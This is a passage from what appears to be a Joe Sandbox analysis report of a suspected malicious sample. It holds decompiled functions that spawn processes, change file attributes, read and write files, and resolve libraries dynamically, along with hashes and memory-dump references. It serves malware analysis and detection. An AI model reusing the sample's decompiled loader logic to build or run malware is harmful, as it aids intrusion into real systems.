						 *0x7a7a8c =  *0x7a7a8c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x7a7a8c, 0x7530,  *0x7a7a74), 0);
					}
				}
				return 0;
			}











                                                        0x0040138a
                                                        0x004013fa
                                                        0x0040139b
                                                        0x004013a0
                                                        0x00000000
                                                        0x00000000
                                                        0x004013a2
                                                        0x004013a3
                                                        0x004013ad
                                                        0x00000000
                                                        0x00401404
                                                        0x004013b0
                                                        0x004013b7
                                                        0x004013bd
                                                        0x004013be
                                                        0x004013c0
                                                        0x004013c2
                                                        0x004013b9
                                                        0x004013b9
                                                        0x004013ba
                                                        0x004013ba
                                                        0x004013c9
                                                        0x004013cb
                                                        0x004013f4
                                                        0x004013f4
                                                        0x004013c9
                                                        0x00000000

                                                        APIs
                                                        • MulDiv.KERNEL32 ref: 004013E4
                                                        • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
                                                        • Instruction ID: 0d0e525a89db022a3713d7d40a62d3a92fa7a1992dda9c0477917c3d4d329065
                                                        • Opcode Fuzzy Hash: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
                                                        • Instruction Fuzzy Hash: 5901F432624220ABE7094B389D05B2A3698E751315F10C67FF851F79F1EA78CC02DB4C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405C51 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00405C51(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x7a4f90->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a4f90,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                        0x00405c5a
                                                        0x00405c7a
                                                        0x00405c82
                                                        0x00405c87
                                                        0x00000000
                                                        0x00405c8d
                                                        0x00405c91

                                                        APIs
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F90,00000000), ref: 00405C7A
                                                        • CloseHandle.KERNEL32(?), ref: 00405C87
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateHandleProcess
                                                        • String ID:
                                                        • API String ID: 3712363035-0
                                                        • Opcode ID: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
                                                        • Instruction ID: 1fa2a79eb519949bf7d30246b9e4481379e3d274eb9e55713eae969c2627164f
                                                        • Opcode Fuzzy Hash: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
                                                        • Instruction Fuzzy Hash: 6AE0B6F4A00209BFEB00DFA4EE09F7B7AACEB44604F408525BD54F2191D7B9A8148A78
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406A3B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00406A3B(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069CB(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                        0x00406a43
                                                        0x00406a46
                                                        0x00406a4d
                                                        0x00406a55
                                                        0x00406a61
                                                        0x00000000
                                                        0x00406a68
                                                        0x00406a58
                                                        0x00406a5f
                                                        0x00000000
                                                        0x00406a70
                                                        0x00000000

                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406A68
                                                          • Part of subcall function 004069CB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
                                                          • Part of subcall function 004069CB: wsprintfW.USER32 ref: 00406A1D
                                                          • Part of subcall function 004069CB: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                        • String ID:
                                                        • API String ID: 2547128583-0
                                                        • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                        • Instruction ID: 8bc6c373ae4a51b79335f269ef4a09a4b84a1385f2c3991dd3566e210a560b2e
                                                        • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                        • Instruction Fuzzy Hash: 56E0867660421066D610A6755D48D3773B89BC6710306843EF556F2040DB38DC359A6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040615E Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 68%
                                                        			E0040615E(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                        0x00406162
                                                        0x0040616f
                                                        0x00406184
                                                        0x0040618a

                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(00000003,00403113,007B6800,80000000,00000003), ref: 00406162
                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCreate
                                                        • String ID:
                                                        • API String ID: 415043291-0
                                                        • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                        • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                        • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                        • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406139 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00406139(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





                                                        0x0040613e
                                                        0x00406144
                                                        0x00406149
                                                        0x00406152
                                                        0x00406152
                                                        0x0040615b

                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
                                                        • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                        • Instruction ID: 4d59290e3aa44cd58c99826dd52d8cee581d87a9a88888807f370448835cb7c6
                                                        • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                        • Instruction Fuzzy Hash: C2D0C972504130ABC2502728AE0889ABB55EB642717014A35F9A5A62B0CB304C628A98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405C1C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00405C1C(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                        0x00405c22
                                                        0x00405c2a
                                                        0x00000000
                                                        0x00405c30
                                                        0x00000000

                                                        APIs
                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
                                                        • GetLastError.KERNEL32 ref: 00405C30
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectoryErrorLast
                                                        • String ID:
                                                        • API String ID: 1375471231-0
                                                        • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                        • Instruction ID: 9b4f5430b3bbe22f75525a6a8288bb62ac5ef9e6fdb3d88c50eeb6a92616e2bf
                                                        • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                        • Instruction Fuzzy Hash: 1EC04C71218609AEE7705B209F0DB177A949B50741F11443A6686F40A0DA788455D92D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406210 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00406210(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                        0x00406214
                                                        0x00406224
                                                        0x0040622c
                                                        0x00000000
                                                        0x00406233
                                                        0x00000000
                                                        0x00406235

                                                        APIs
                                                        • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 00406224
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: FileWrite
                                                        • String ID:
                                                        • API String ID: 3934441357-0
                                                        • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                        • Instruction ID: f08cceda346ec9350f11c22fcf513fe3bc01c5f1c17db0892cf19a12a1b56e8c
                                                        • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                        • Instruction Fuzzy Hash: 95E08C3220026AABCF10AE698C00AEB3B6CFB05360F01447AFE56E7040D334E83087A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004061E1 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E004061E1(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                        0x004061e5
                                                        0x004061f5
                                                        0x004061fd
                                                        0x00000000
                                                        0x00406204
                                                        0x00000000
                                                        0x00406206

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 004061F5
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                        • Instruction ID: a9904075eeec40e7e939a2dde13f9046a7e38eb284923ea40542f090f2fca858
                                                        • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                        • Instruction Fuzzy Hash: 66E08632500219ABDF106E519C04AEB375CFB01350F01487AFD22E2151E231E87187A8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004035FE Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E004035FE(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                        0x0040360c
                                                        0x00403612

                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                        • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                        • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                        • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 78%
                                                        			E00401FA4() {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E004056D0(0xffffffeb, _t7);
				_t9 = E00405C51(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE6(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065B5( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                                                        0x00401faa
                                                        0x00401faf
                                                        0x00401fb5
                                                        0x00401fba
                                                        0x00401fbe
                                                        0x0040292e
                                                        0x00401fc4
                                                        0x00401fc7
                                                        0x00401fca
                                                        0x00401fd2
                                                        0x00401fe1
                                                        0x00401fe3
                                                        0x00401fe3
                                                        0x00401fd4
                                                        0x00401fd8
                                                        0x00401fd8
                                                        0x00401fd2
                                                        0x00401fea
                                                        0x00401feb
                                                        0x00401feb
                                                        0x00402c2d
                                                        0x00402c39

                                                        APIs
                                                          • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                                                          • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                                                          • Part of subcall function 004056D0: lstrcatW.KERNEL32 ref: 0040572B
                                                          • Part of subcall function 004056D0: SetWindowTextW.USER32 ref: 0040573D
                                                          • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                                                          • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                                                          • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                                                          • Part of subcall function 00405C51: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F90,00000000), ref: 00405C7A
                                                          • Part of subcall function 00405C51: CloseHandle.KERNEL32(?), ref: 00405C87
                                                        • CloseHandle.KERNEL32(?), ref: 00401FEB
                                                          • Part of subcall function 00406AE6: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
                                                          • Part of subcall function 00406AE6: GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19
                                                          • Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
